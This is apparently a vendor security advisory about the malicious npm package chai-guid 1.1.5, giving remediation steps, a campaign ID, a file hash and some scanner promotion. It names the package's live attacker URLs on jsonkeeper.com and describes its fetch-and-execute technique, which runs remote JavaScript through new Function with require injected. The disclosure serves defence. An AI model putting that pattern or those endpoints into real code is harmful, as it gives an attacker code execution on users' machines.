Which versions of chai-guid are malicious?

The following npm versions of chai-guid are flagged malicious: 1.1.5. Treat any of these as compromised.

How do I remediate chai-guid if I installed it?

Remove chai-guid from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is chai-guid part of a known attack campaign?

Yes — chai-guid is associated with the IN-MAL-2026-006791 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect chai-guid in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking chai-guid and packages like it before any post-install script runs.

Malicious package

chai-guidnpm

Malicious code in chai-guid (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5903

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall chai-guid

What this malware does

chai-guid impersonates the pino logger and the chai-guid chai plugin (README copies pino badges and pinojs CI links; index.js exports middleware as module.exports.pino). When a consumer calls the exported middleware, index.js spawns lib/caller.js as a detached Node process with stdio ignored. lib/caller.js performs axios.get('https://jsonkeeper.com/b/U2BTS'), reads the .cookie field of the response, and executes it via new Function.constructor('require', s)(require) — running attacker-controlled JavaScript with full Node privileges and require injected. A second base64-encoded URL (https://jsonkeeper.com/b/XRGF3) is hidden in a fake process.env.DEV_API_KEY shim in lib/caller.js and lib/const.js as a secondary C2 endpoint. jsonkeeper.com is an anonymous, mutable JSON-paste host; whatever bytes the attacker pastes there will be executed on the installer's machine the moment any consumer invokes the package's middleware.

Malicious versions

1 flagged

1.1.5

Indicators of compromise (SHA-256)

69e9bcacf8dca52aafe4d93019b888c6d32e344b500a21368f036bf586eee161

Frequently asked questions

No. chai-guid on npm has been identified as a malicious package (version 1.1.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006791

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection